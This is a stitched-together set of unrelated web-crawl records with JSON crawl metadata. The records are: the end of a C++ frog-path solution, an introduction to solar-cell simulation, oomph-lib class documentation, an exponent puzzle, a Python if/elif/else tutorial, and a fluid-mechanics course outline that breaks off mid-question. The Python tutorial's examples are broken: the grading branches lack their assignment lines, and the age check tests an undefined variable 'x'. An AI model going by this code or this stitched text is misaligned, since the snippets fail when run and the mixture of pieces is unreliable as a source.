x=a[j].x,y=a[j].y;\nwhile(judge(x,y)&&G[x][y]) //扩充当前点集数目\nx+=dx,y+=dy,t++;\nif(!judge(x+dx,y+dy)) //如果扩充之后青蛙可以正常跳出去,更新ans\nans=max(ans,t);\n}\nreturn ans>2?ans:0;\n}\n\nint main()\n{\nwhile(~scanf(\"%d%d\",&row,&col))\n{\nscanf(\"%d\",&N);\nmemset(G,false,sizeof(G));\nfor(int i=0; i<N; i++)\n{\nscanf(\"%d%d\",&a[i].x,&a[i].y);\nG[a[i].x][a[i].y]=true; //标记这些点被青蛙踩过\n}\nsort(a,a+N);\nprintf(\"%d\\n\",solve());\n}\nreturn 0;\n}" ]
[ null, "https://www.dreamwings.cn/wp-content/uploads/2017/03/frog1.jpg", null, "https://www.dreamwings.cn/wp-content/uploads/2017/03/frog2.jpg", null, "https://www.dreamwings.cn/wp-content/uploads/2017/03/frog3.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7751662,"math_prob":0.94797814,"size":4022,"snap":"2022-27-2022-33","text_gpt3_token_len":1467,"char_repetition_ratio":0.11921354,"word_repetition_ratio":0.0,"special_character_ratio":0.2913973,"punctuation_ratio":0.13793103,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98009783,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-02T11:21:23Z\",\"WARC-Record-ID\":\"<urn:uuid:256f1c43-c92e-43db-b7cd-2abacb22404a>\",\"Content-Length\":\"48929\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:95e82a55-8be3-4868-8b34-e6e4e8ef07a7>\",\"WARC-Concurrent-To\":\"<urn:uuid:f815e5c7-e6ef-4953-aff5-890f6409326a>\",\"WARC-IP-Address\":\"139.196.178.145\",\"WARC-Target-URI\":\"https://www.dreamwings.cn/poj1054/4539.html\",\"WARC-Payload-Digest\":\"sha1:O2RFUY5ODCC6DTW2BGNIPI3EP6XSF3RN\",\"WARC-Block-Digest\":\"sha1:VYPVZWZKCWYAB6ZAEL5AUVHGW5TKPYWG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104054564.59_warc_CC-MAIN-20220702101738-20220702131738-00490.warc.gz\"}"}
https://www.pveducation.org/id/node/228
[ "# Introduction to Simulation\n\nThe equations that describe solar cell can be solved analytically or numerically. While the analytical equations are easier to solve by hand and give great insight into cell operation, they become difficult to solve as more factors of cell operation are included. In the past, it was common to re-write the equations slightly to simplify the solution to solve specific cases, however, such methods are time consuming. For example. the solar cell modelling program on page XXX accurately models solar cell operation but only for a limited number cases as noted on the page.\n\nComputer speeds have increased (and memory for 2D cases) so it is now easier to write a general solver that applies to most cases. There are an enormous number of packages for modelling semiconductor devices. However most of these packages either don't consider light generation or only partially include light generation effects. Even for packages specifically designed for simulating solar cells there exist a wide range of solvers both in house and commercially available for simulating solar cell operation. Most of these packages have fairly similar basic module and it comes down to how fast they are, how easy they are to use and how many effects they model.\n\nThe basic operation of a modelling program consists of setting up the model with user defined parameters, a generation of nodes to solve, then iterating to produce a solution that is consistent with all the nodes.\n\nTwo device modelling programs used commonly within the photovoltaic community: PC1D for one-dimensional modelling and DESSIS for two dimensional modelling" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9522061,"math_prob":0.9460631,"size":1607,"snap":"2022-27-2022-33","text_gpt3_token_len":297,"char_repetition_ratio":0.12913288,"word_repetition_ratio":0.0,"special_character_ratio":0.17672682,"punctuation_ratio":0.067857146,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95041275,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-04T12:43:07Z\",\"WARC-Record-ID\":\"<urn:uuid:3e9d7eda-43c6-4d72-bd9f-3d877c7a3886>\",\"Content-Length\":\"38681\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9c1ae765-56ec-43ca-909a-52fe2e68c56f>\",\"WARC-Concurrent-To\":\"<urn:uuid:0e305ec9-e89f-4d58-9abd-ce00599f8732>\",\"WARC-IP-Address\":\"172.67.199.114\",\"WARC-Target-URI\":\"https://www.pveducation.org/id/node/228\",\"WARC-Payload-Digest\":\"sha1:X7I3CCGX2YTM5X3TCWBDUZ46CFNHH4WW\",\"WARC-Block-Digest\":\"sha1:BUOPVUNXLTP3C7YQUAHAFHXD4OQPVD53\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104375714.75_warc_CC-MAIN-20220704111005-20220704141005-00065.warc.gz\"}"}
https://oomph-lib.github.io/oomph-lib/doc/the_data_structure/html/classoomph_1_1DoubleVectorWithHaloEntries.html
[ "oomph::DoubleVectorWithHaloEntries Class Reference\n\n===================================================================== An extension of DoubleVector that allows access to certain global entries that are not stored locally. Synchronisation of these values must be performed manually by calling the synchronise() function. Synchronisation can only be from the haloed to the halo, but the local halo entries can all be summed and stored in the More...\n\n`#include <double_vector_with_halo.h>`", null, "Inheritance diagram for oomph::DoubleVectorWithHaloEntries:\n\n## Public Member Functions\n\nDoubleVectorWithHaloEntries ()\nConstructor for an uninitialized DoubleVectorWithHaloEntries. More...\n\nDoubleVectorWithHaloEntries (const LinearAlgebraDistribution *const &dist_pt, DoubleVectorHaloScheme *const &halo_scheme_pt=0, const double &v=0.0)\nConstructor. Assembles a DoubleVectorWithHaloEntries with a prescribed distribution. Additionally every entry can be set (with argument v - defaults to 0). More...\n\nDoubleVectorWithHaloEntries (const LinearAlgebraDistribution &dist, DoubleVectorHaloScheme *const &halo_scheme_pt=0, const double &v=0.0)\nConstructor. Assembles a DoubleVectorWithHaloEntries with a prescribed distribution. Additionally every entry can be set (with argument v - defaults to 0). More...\n\n~DoubleVectorWithHaloEntries ()\nDestructor. More...\n\nDoubleVectorWithHaloEntries (const DoubleVectorWithHaloEntries &new_vector)\nCopy constructor from any DoubleVector. More...\n\nDoubleVectorWithHaloEntries (const DoubleVector &new_vector, DoubleVectorHaloScheme *const &halo_scheme_pt=0)\nCopy constructor from any DoubleVector. More...\n\nvoid operator= (const DoubleVectorWithHaloEntries &old_vector)\nassignment operator More...\n\ndouble & global_value (const unsigned &i)\n\nconst double & global_value (const unsigned &i) const\n\nvoid synchronise ()\nSynchronise the halo data. More...\n\nvoid sum_all_halo_and_haloed_values ()\nSum all the data, store in the master (haloed) data and then synchronise. More...\n\nDoubleVectorHaloScheme *& halo_scheme_pt ()\nAccess function for halo scheme. More...\n\nDoubleVectorHaloScheme *const & halo_scheme_pt () const\nAccess function for halo scheme (const version) More...\n\nvoid build_halo_scheme (DoubleVectorHaloScheme *const &halo_scheme_pt)\nConstruct the halo scheme and storage for the halo data. More...", null, "Public Member Functions inherited from oomph::DoubleVector\nDoubleVector ()\nConstructor for an uninitialized DoubleVector. More...\n\nDoubleVector (const LinearAlgebraDistribution *const &dist_pt, const double &v=0.0)\nConstructor. Assembles a DoubleVector with a prescribed distribution. Additionally every entry can be set (with argument v - defaults to 0). More...\n\nDoubleVector (const LinearAlgebraDistribution &dist, const double &v=0.0)\nConstructor. Assembles a DoubleVector with a prescribed distribution. Additionally every entry can be set (with argument v - defaults to 0). More...\n\n~DoubleVector ()\nDestructor - just calls this->clear() to delete the distribution and data. More...\n\nDoubleVector (const DoubleVector &new_vector)\nCopy constructor. More...\n\nvoid operator= (const DoubleVector &old_vector)\nassignment operator More...\n\nvoid build (const DoubleVector &old_vector)\nJust copys the argument DoubleVector. More...\n\nvoid build (const LinearAlgebraDistribution &dist, const double &v)\nAssembles a DoubleVector with distribution dist, if v is specified each element is set to v, otherwise each element is set to 0.0. More...\n\nvoid build (const LinearAlgebraDistribution *const &dist_pt, const double &v)\nAssembles a DoubleVector with distribution dist, if v is specified each element is set to v, otherwise each element is set to 0.0. More...\n\nvoid build (const LinearAlgebraDistribution &dist, const Vector< double > &v)\nAssembles a DoubleVector with a distribution dist and coefficients taken from the vector v. Note. The vector v MUST be of length nrow() More...\n\nvoid build (const LinearAlgebraDistribution *const &dist_pt, const Vector< double > &v)\nAssembles a DoubleVector with a distribution dist and coefficients taken from the vector v. Note. The vector v MUST be of length nrow() More...\n\nvoid initialise (const double &v)\ninitialise the whole vector with value v More...\n\nvoid initialise (const Vector< double > v)\ninitialise the vector with coefficient from the vector v. Note: The vector v must be of length More...\n\nvoid clear ()\nwipes the DoubleVector More...\n\nbool built () const\n\nvoid set_external_values (const LinearAlgebraDistribution *const &dist_pt, double *external_values, bool delete_external_values)\nAllows are external data to be used by this vector. WARNING: The size of the external data must correspond to the LinearAlgebraDistribution dist_pt argument. More...\n\nvoid set_external_values (double *external_values, bool delete_external_values)\nAllows are external data to be used by this vector. WARNING: The size of the external data must correspond to the distribution of this vector. More...\n\nvoid redistribute (const LinearAlgebraDistribution *const &dist_pt)\nThe contents of the vector are redistributed to match the new distribution. In a non-MPI rebuild this method works, but does nothing. NOTE 1: The current distribution and the new distribution must have the same number of global rows. NOTE 2: The current distribution and the new distribution must have the same Communicator. More...\n\ndouble & operator[] (int i)\n[] access function to the (local) values of this vector More...\n\nbool operator== (const DoubleVector &v)\n== operator More...\n\nvoid operator+= (const DoubleVector &v)\n+= operator with another vector More...\n\nvoid operator-= (const DoubleVector &v)\n-= operator with another vector More...\n\nvoid operator*= (const double &d)\nmultiply by a double More...\n\nvoid operator/= (const double &d)\ndivide by a double More...\n\nconst double & operator[] (int i) const\n[] access function to the (local) values of this vector More...\n\ndouble max () const\nreturns the maximum coefficient More...\n\ndouble * values_pt ()\naccess function to the underlying values More...\n\ndouble * values_pt () const\naccess function to the underlying values (const version) More...\n\nvoid output (std::ostream &outfile, const int &output_precision=-1) const\noutput the global contents of the vector More...\n\nvoid output (std::string filename, const int &output_precision=-1) const\noutput the global contents of the vector More...\n\nvoid output_local_values (std::ostream &outfile, const int &output_precision=-1) const\noutput the local contents of the vector More...\n\nvoid output_local_values (std::string filename, const int &output_precision=-1) const\noutput the local contents of the vector More...\n\nvoid output_local_values_with_offset (std::ostream &outfile, const int &output_precision=-1) const\noutput the local contents of the vector More...\n\nvoid output_local_values_with_offset (std::string filename, const int &output_precision=-1) const\noutput the local contents of the vector More...\n\ndouble dot (const DoubleVector &vec) const\ncompute the dot product of this vector with the vector vec. More...\n\ndouble norm () const\ncompute the 2 norm of this vector More...\n\ndouble norm (const CRDoubleMatrix *matrix_pt) const\ncompute the A-norm using the matrix at matrix_pt More...", null, "Public Member Functions inherited from oomph::DistributableLinearAlgebraObject\nDistributableLinearAlgebraObject ()\nDefault constructor - create a distribution. More...\n\nDistributableLinearAlgebraObject (const DistributableLinearAlgebraObject &matrix)=delete\nBroken copy constructor. More...\n\nvoid operator= (const DistributableLinearAlgebraObject &)=delete\nBroken assignment operator. More...\n\nvirtual ~DistributableLinearAlgebraObject ()\nDestructor. More...\n\nunsigned nrow () const\naccess function to the number of global rows. More...\n\nunsigned nrow_local () const\naccess function for the num of local rows on this processor. More...\n\nunsigned nrow_local (const unsigned &p) const\naccess function for the num of local rows on this processor. More...\n\nunsigned first_row () const\naccess function for the first row on this processor More...\n\nunsigned first_row (const unsigned &p) const\naccess function for the first row on this processor More...\n\nbool distributed () const\ndistribution is serial or distributed More...\n\nbool distribution_built () const\nif the communicator_pt is null then the distribution is not setup then false is returned, otherwise return true More...\n\nvoid build_distribution (const LinearAlgebraDistribution *const dist_pt)\nsetup the distribution of this distributable linear algebra object More...\n\nsetup the distribution of this distributable linear algebra object More...\n\n## Private Attributes\n\nDoubleVectorHaloSchemeHalo_scheme_pt\nPointer to the lookup scheme that stores information about on which processor the required information is haloed. More...\n\nVector< double > Halo_value\nVector of the halo values. More...", null, "Protected Member Functions inherited from oomph::DistributableLinearAlgebraObject\nvoid clear_distribution ()\nclear the distribution of this distributable linear algebra object More...\n\n## Detailed Description\n\n===================================================================== An extension of DoubleVector that allows access to certain global entries that are not stored locally. Synchronisation of these values must be performed manually by calling the synchronise() function. Synchronisation can only be from the haloed to the halo, but the local halo entries can all be summed and stored in the\n\n# haloed value.\n\nDefinition at line 149 of file double_vector_with_halo.h.\n\n## ◆ DoubleVectorWithHaloEntries() [1/5]\n\n oomph::DoubleVectorWithHaloEntries::DoubleVectorWithHaloEntries ( )\ninline\n\nConstructor for an uninitialized DoubleVectorWithHaloEntries.\n\nDefinition at line 160 of file double_vector_with_halo.h.\n\n## ◆ DoubleVectorWithHaloEntries() [2/5]\n\n oomph::DoubleVectorWithHaloEntries::DoubleVectorWithHaloEntries ( const LinearAlgebraDistribution *const & dist_pt, DoubleVectorHaloScheme *const & halo_scheme_pt = `0`, const double & v = `0.0` )\ninline\n\nConstructor. Assembles a DoubleVectorWithHaloEntries with a prescribed distribution. Additionally every entry can be set (with argument v - defaults to 0).\n\nDefinition at line 166 of file double_vector_with_halo.h.\n\nReferences build_halo_scheme(), and halo_scheme_pt().\n\n## ◆ DoubleVectorWithHaloEntries() [3/5]\n\n oomph::DoubleVectorWithHaloEntries::DoubleVectorWithHaloEntries ( const LinearAlgebraDistribution & dist, DoubleVectorHaloScheme *const & halo_scheme_pt = `0`, const double & v = `0.0` )\ninline\n\nConstructor. Assembles a DoubleVectorWithHaloEntries with a prescribed distribution. Additionally every entry can be set (with argument v - defaults to 0).\n\nDefinition at line 180 of file double_vector_with_halo.h.\n\nReferences build_halo_scheme(), and halo_scheme_pt().\n\n## ◆ ~DoubleVectorWithHaloEntries()\n\n oomph::DoubleVectorWithHaloEntries::~DoubleVectorWithHaloEntries ( )\ninline\n\nDestructor.\n\nDefinition at line 191 of file double_vector_with_halo.h.\n\n## ◆ DoubleVectorWithHaloEntries() [4/5]\n\n oomph::DoubleVectorWithHaloEntries::DoubleVectorWithHaloEntries ( const DoubleVectorWithHaloEntries & new_vector )\ninline\n\nCopy constructor from any DoubleVector.\n\nDefinition at line 195 of file double_vector_with_halo.h.\n\nReferences build_halo_scheme(), and halo_scheme_pt().\n\n## ◆ DoubleVectorWithHaloEntries() [5/5]\n\n oomph::DoubleVectorWithHaloEntries::DoubleVectorWithHaloEntries ( const DoubleVector & new_vector, DoubleVectorHaloScheme *const & halo_scheme_pt = `0` )\ninline\n\nCopy constructor from any DoubleVector.\n\nDefinition at line 203 of file double_vector_with_halo.h.\n\nReferences build_halo_scheme(), and halo_scheme_pt().\n\n## ◆ build_halo_scheme()\n\n void oomph::DoubleVectorWithHaloEntries::build_halo_scheme ( DoubleVectorHaloScheme *const & halo_scheme_pt )\n\nConstruct the halo scheme and storage for the halo data.\n\nDefinition at line 379 of file double_vector_with_halo.cc.\n\n## ◆ global_value() [1/2]\n\n double & oomph::DoubleVectorWithHaloEntries::global_value ( const unsigned & i )\ninline\n\n## ◆ global_value() [2/2]\n\n const double & oomph::DoubleVectorWithHaloEntries::global_value ( const unsigned & i ) const\ninline\n\nDefinition at line 268 of file double_vector_with_halo.h.\n\n## ◆ halo_scheme_pt() [1/2]\n\n DoubleVectorHaloScheme *& oomph::DoubleVectorWithHaloEntries::halo_scheme_pt ( )\ninline\n\nAccess function for halo scheme.\n\nDefinition at line 323 of file double_vector_with_halo.h.\n\nReferences Halo_scheme_pt.\n\nReferenced by build_halo_scheme(), DoubleVectorWithHaloEntries(), and operator=().\n\n## ◆ halo_scheme_pt() [2/2]\n\n DoubleVectorHaloScheme *const & oomph::DoubleVectorWithHaloEntries::halo_scheme_pt ( ) const\ninline\n\nAccess function for halo scheme (const version)\n\nDefinition at line 329 of file double_vector_with_halo.h.\n\nReferences Halo_scheme_pt.\n\n## ◆ operator=()\n\n void oomph::DoubleVectorWithHaloEntries::operator= ( const DoubleVectorWithHaloEntries & old_vector )\ninline\n\nassignment operator\n\nDefinition at line 213 of file double_vector_with_halo.h.\n\nReferences oomph::DoubleVector::build(), build_halo_scheme(), and halo_scheme_pt().\n\n## ◆ sum_all_halo_and_haloed_values()\n\n void oomph::DoubleVectorWithHaloEntries::sum_all_halo_and_haloed_values ( )\n\nSum all the data, store in the master (haloed) data and then synchronise.\n\nGather all ther data from multiple processors and sum the result which will be stored in the master copy and then synchronised to all copies. This requires two \"all to all\" communications.\n\nDefinition at line 323 of file double_vector_with_halo.cc.\n\n## ◆ synchronise()\n\n void oomph::DoubleVectorWithHaloEntries::synchronise ( )\n\nSynchronise the halo data.\n\nSynchronise the halo data within the vector. This requires one \"all to all\" communnication.\n\nDefinition at line 269 of file double_vector_with_halo.cc.\n\n## ◆ Halo_scheme_pt\n\n DoubleVectorHaloScheme* oomph::DoubleVectorWithHaloEntries::Halo_scheme_pt\nprivate\n\nPointer to the lookup scheme that stores information about on which processor the required information is haloed.\n\nDefinition at line 153 of file double_vector_with_halo.h.\n\n## ◆ Halo_value\n\n Vector oomph::DoubleVectorWithHaloEntries::Halo_value\nprivate\n\nVector of the halo values.\n\nDefinition at line 156 of file double_vector_with_halo.h.\n\nReferenced by build_halo_scheme(), global_value(), sum_all_halo_and_haloed_values(), and synchronise().\n\nThe documentation for this class was generated from the following files:" ]
[ null, "https://oomph-lib.github.io/oomph-lib/doc/the_data_structure/html/closed.png", null, "https://oomph-lib.github.io/oomph-lib/doc/the_data_structure/html/closed.png", null, "https://oomph-lib.github.io/oomph-lib/doc/the_data_structure/html/closed.png", null, "https://oomph-lib.github.io/oomph-lib/doc/the_data_structure/html/closed.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.59076196,"math_prob":0.5799622,"size":15097,"snap":"2022-27-2022-33","text_gpt3_token_len":3634,"char_repetition_ratio":0.20479693,"word_repetition_ratio":0.43437317,"special_character_ratio":0.2281248,"punctuation_ratio":0.25613886,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9552661,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-06T22:27:35Z\",\"WARC-Record-ID\":\"<urn:uuid:686e7498-3a82-4422-9fc4-fc3ad2faf226>\",\"Content-Length\":\"108505\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4632ed14-44bd-4ccd-8a5c-5b176c9494d8>\",\"WARC-Concurrent-To\":\"<urn:uuid:44310a9c-f141-4b67-ac0c-a70236a1b415>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://oomph-lib.github.io/oomph-lib/doc/the_data_structure/html/classoomph_1_1DoubleVectorWithHaloEntries.html\",\"WARC-Payload-Digest\":\"sha1:TAKLQ44BVJXZ2QC7ISTUJHSGP6Y2TRX4\",\"WARC-Block-Digest\":\"sha1:WNYBLOKWQTYU64RXLTUHIXNHFSQAZMZP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104678225.97_warc_CC-MAIN-20220706212428-20220707002428-00537.warc.gz\"}"}
https://brilliant.org/problems/all-look-same/
[ "# All look same\n\nAlgebra Level 2\n\nWhich among the following is the largest?\n$\\large 3^{2^{2^2}}, \\quad [(3^2)^2]^2, \\quad 3^{2 \\times 2 \\times 2}, \\quad 3222$\n\n×" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.61160165,"math_prob":0.9989736,"size":279,"snap":"2020-34-2020-40","text_gpt3_token_len":110,"char_repetition_ratio":0.14181818,"word_repetition_ratio":0.0,"special_character_ratio":0.4982079,"punctuation_ratio":0.278481,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9880321,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-26T00:13:31Z\",\"WARC-Record-ID\":\"<urn:uuid:f1476bff-6f32-4180-975e-e79ec12cb609>\",\"Content-Length\":\"47075\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:101abe0b-5a15-47ea-9533-460a2b328d02>\",\"WARC-Concurrent-To\":\"<urn:uuid:fed857f5-6399-4d4c-ad67-8d428302319c>\",\"WARC-IP-Address\":\"104.20.34.242\",\"WARC-Target-URI\":\"https://brilliant.org/problems/all-look-same/\",\"WARC-Payload-Digest\":\"sha1:2CVONTELTHI35D4VYKWJLRFNJ6SKMBFL\",\"WARC-Block-Digest\":\"sha1:COF62EYI22PMT2DMIDTDKFZVNIAOLGL2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400228998.45_warc_CC-MAIN-20200925213517-20200926003517-00752.warc.gz\"}"}
https://learnbatta.com/course/python/python-working-with-if-elif-else-conditions/
[ "Python working with if ... elif ... else conditions\n\nLets start working with if ... elif .. else conditions in python. \"if ... elif .. else\" allow us to take decisions. It can be nested. In some cases we may need to execute the code based on conditions. Then we use \"if ... elif ... else\" conditions in python. For example, if we wan to sort the students based on their grades then we have to use these conditional expressions(if ... elif...else).\n\nUsing \"if\" statement in python:\n\nThe syntax of the if condition is\n\nif(condition):\nstatement(s)\n\nUse case: Take a number in a name/variable with some integer value and add 50 if number is less than 100 and print the resulting number.\n\nnumber = 20\nif number < 100:\nnumber = number + 50\nprint(number)\n# Output: 70\n\nUsing \"if ... else\" statements in python:\n\nThe syntax of the if condition is\n\nif(condition):\nstatement(s)\nelse:\nstatement(s)\n\nUse case: Take a number and check if it is odd number or not(if the number is odd number if its remainder is 1).\n\nnumber = 21\nif number % 2 == 1:\nprint(\"odd\")\nelse:\nprint(\"even\")\nprint(number)\n# Output: odd\n\nUsing \"if ... elif...else\" statements in python:\n\nThe elif statement allows us to check multiple conditions and execute a block of code as soon as one of the conditions are valid. we can have multiple number of \"elif\" statements followed by a \"if\" statement.\nNote: elif statement is optional\n\nThe syntax of the if condition is\n\nif(condition1):\nstatement(s)\nelif(condition2):\nstatement(s)\nelif(condition3):\nstatement(s)\nelse:\nstatement(s)\n\nUse case: Take a student marks in a name/variable and check the student grade based on below conditions.\nIf marks greater than or equal to 90 grade is \"A\"\nIf marks are in between 80 and 89 (inclusive) then grade is \"B\"\nIf marks are in between 70 and 79 (inclusive) then grade is \"C\"\nIf marks are in between 60 and 79 (inclusive) then grade is \"D\"\nIf marks below 60 then grade is \"F\"\n\n​​​​​marks = 80\nif marks >= 90:\nelif marks >= 80:\nelif marks >= 70:\nelif marks >= 60:\nelse:\n#output: B\n\nUsing nested \"if ... elif...else\" statements in python:\n\nWe can use if...elif...else statement inside another if...elif...else statement. It is called as nested conditioning.\n\nUse case:  You have a adult website. You have to restrict users who are having age under 18 years and old people who are having age above 80 years.\n\nage = int(input('Enter your age: '))\nif age > 18:\nif x > 80:\nprint('You are too old, go away!')\nelse:\nprint('Welcome, you are of the right age!')\nelse:\nprint('You are too young, go away!')\n\nNote: \"input\" will allow program to take data from user or keyboard at program runtime." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82462555,"math_prob":0.9865613,"size":2675,"snap":"2019-43-2019-47","text_gpt3_token_len":687,"char_repetition_ratio":0.17895919,"word_repetition_ratio":0.07337526,"special_character_ratio":0.29196262,"punctuation_ratio":0.18845502,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9708053,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-22T00:46:53Z\",\"WARC-Record-ID\":\"<urn:uuid:679c29d9-ca76-4b4d-b957-ad1feae8285c>\",\"Content-Length\":\"16505\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7a90feb9-8f81-4b87-8ea8-34a9ff6ce0ee>\",\"WARC-Concurrent-To\":\"<urn:uuid:fef0dc6e-ba78-4247-9949-ea3715eea0c2>\",\"WARC-IP-Address\":\"104.31.68.188\",\"WARC-Target-URI\":\"https://learnbatta.com/course/python/python-working-with-if-elif-else-conditions/\",\"WARC-Payload-Digest\":\"sha1:OYS6BCTO7PDTAMGGXDSAS4S7ZL5NKKDL\",\"WARC-Block-Digest\":\"sha1:PPOP53THF7SK6KKD74DUXUPITWLCZN27\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570987795403.76_warc_CC-MAIN-20191022004128-20191022031628-00531.warc.gz\"}"}
http://wel.nlytn.in/visual-physics/mechanics-&-matter/fluids.html
[ "", null, "##### Fluids\n\nWhat are Fluids ? Why can?t fluids retain their shape ? What is Viscosity ?\n\n##### Pressure - 1\n\nWhat is Pressure ? Derivation of pressure due to a liquid at depth h inside it.\n\n##### Q1\n\nWater is filled to height h in a vessel as shown in the figure.\nFind the pressure exerted by water on the botton face of vessel.\n\n##### Q2\n\nWater is poured upto same height in the three vessels having the same area of base, as shown in the figure.\nIs the force exerted by water on the base of vessels equal ?\nIs the weight of water in all the vessels equal ?\n\n##### Pressure - 2\n\nAtmospheric Pressure and Absolute Pressure.\n\n##### Q3\n\nConsider a rectangular tank of size (l b w) filled with a liquid of density r to a height H as shown in fig. Find the force at the base and on the walls of the tank.\nWhat is the effective point of application of force on the side wall?\n\n##### Q4\n\nFind the force exerted by the liquid on the side walls of the vessel in the situations shown in the figure.\nDensity of liquid is = r, Width of vessel is = w\n\n##### Q5\n\nWater is contained in a vessel as shown in the figure. Compute the horizontal and vertical components of force due to hydrostatic pressure on the section AB, which is a quarter of a cylinder of radius r. Given that\nr = 5m and that the gate is 4 m wide.\n\nPascals Law\n\n##### Q6\n\nIn a hydraulic press, the cross sectional area of the two cylinders is A1 and A2 respectively. A force F1 is applied to smaller cylinder.\na) What is the pressure produced in the cylinders?\nb) What is the thrust exerted on the larger plunger?\nc) How much work is done by the operator, if the smaller plunger moves down a distance d1?\n\n##### Uniform Acc - 1\n\nPressure inside a fluid uniformly accelerating in horizontal direction.\n\n##### Q7\n\nFigure shows an L-shaped tube filled with a liquid to a height h. What should be the horizontal acceleration a of the tube so that the pressure at the point B becomes atmospheric.\n\n##### Uniform Acc - 2\n\nPressure inside a fluid uniformly accelerating in vertical or slanted direction.\n\n##### Q8\n\nA trolley containing a liquid slides down a smooth inclined of angle a with the horizontal. Find the angle of inclination q of the free surface with the horizontal.\n\n##### Rotating Fluids\n\nEquation of Surface of a Rotating Fluid.\n\n##### Q9\n\nA cylindrical vessel of radius R and height H is filled up to 4H/5 with a liquid of specific gravity . The vessel is rotated about its axis.\na) Determine the speed of rotation when the liquid just starts spilling.\nb) Determine the height of lowest point of surface of liquid at the above speed.\nc) Find the speed of rotation when the base is just visible.\n\n##### Buoyancy\n\nBuoyancy and Archimedes? Principle.\n\n##### Q10\n\nA wooden object floats in water kept in a beaker. The object is near a side of the beaker. Let P1, P2, P3 be the pressures at the three points A, B and C of the bottom as shown in figure.\n(a) P1 = P2 = P3\n(b) P1 < P2 < P3\n(c) P1 > P2 > P3\n(d) P1 = P2 ? P3\n\n##### Q11\n\nA piece of wood floats in water kept in a beaker. If the beaker moves with a vertical acceleration a, the wood will\n(a) sink deeper in the liquid if a is upward\n(b) sink deeper in the liquid if a is downward, with a < g\n(c) come out more from the liquid if a is downward, with a < g\n(d) remain in the same position relative to the water\n\n##### Equilibrium\n\nRelative placement of Center of Gravity and Center of Buoyancy determines the Equilibrium of a Floating body. What is Meta-Center ?\n\n##### Q12\n\nA wooden stick of length L, radius R and density r has a small metal piece of mass m (of negligible volume) attached to its one end. Find the minimum value for the mass m (in terms of given parameters) that would make the stick float vertically in equilibrium in a liquid of density s ( > r ).\n\n##### Fluid Dynamics\n\nUnderstanding Streamlined and Turbulent flow. Equation of Continuity.\n\n##### Bernoulli\\'\\'s Eqn 1\n\nDerivation and Understanding of Bernoulli?s Equation. Is Bernoulli?s Equation fluid version of Work-Kinetic Energy theorem ?\n\n##### Bernoulli\\'\\'s Eqn 2\n\nSome applications of the Bernoulli?s Equation to some special cases.\n\n##### Q13\n\nIn a streamline flow,\n(a) the speed of the particle always remains same\n(b) the velocity of particle always remains same\n(c) the kinetic energies of all the particles arriving at a given point are the same\n(d) the momentum of all the particles arriving at a given point are the same.\n\n##### Q14\n\nConsider a uniform cylindrical tube completely filled with water. Water enters the tube through end A with speed v1 and leaves through end B with speed v2. In case I the tube is horizontal, in case II it is vertical with the end A upward and in case III it is vertical with the end B upward.\nWe have v1 = v2 for\n(a) case I\n(b) case II\n(c) case III\n(d) all cases.\n\n##### Q15\n\nWater flows smoothly through the pipe shown in the figure, descending in the process. Rank the four numbered sections of pipe according to\na) the volume flow rate Rv through them,\nb) the flow speed v through them, and\nc) the water pressure P at them, greatest first.\n\n##### Surface Tension\n\nExplanation of Surface Tension and Surface Energy.\n\n##### Q16\n\nWater is filled up to a height h in a beaker of radius R as shown in figure. The density of water is r, the surface tension of water is T and the atmospheric pressure is Po. Consider a vertical section ABCD of the water column through a diameter of the beaker. The force on water on one side of this section by water on the other side of this section has magnitude\n\n##### Viscosity\n\nExplanation of Viscosity.\n\n##### 1\n\nAn open U-tube contains two liquids of different densities. If the density of heavier liquid is , find the density of lighter liquid in terms of the heights. h1 and h2\n\n##### 2\n\nA U-tube of uniform cross section contains mercury (density r) in both of its arms.\nLiquids of different densities are poured into each arm of the tube until the upper surfaces of both the liquids are in the same horizontal level.\nIf the density of the liquids is h1 and 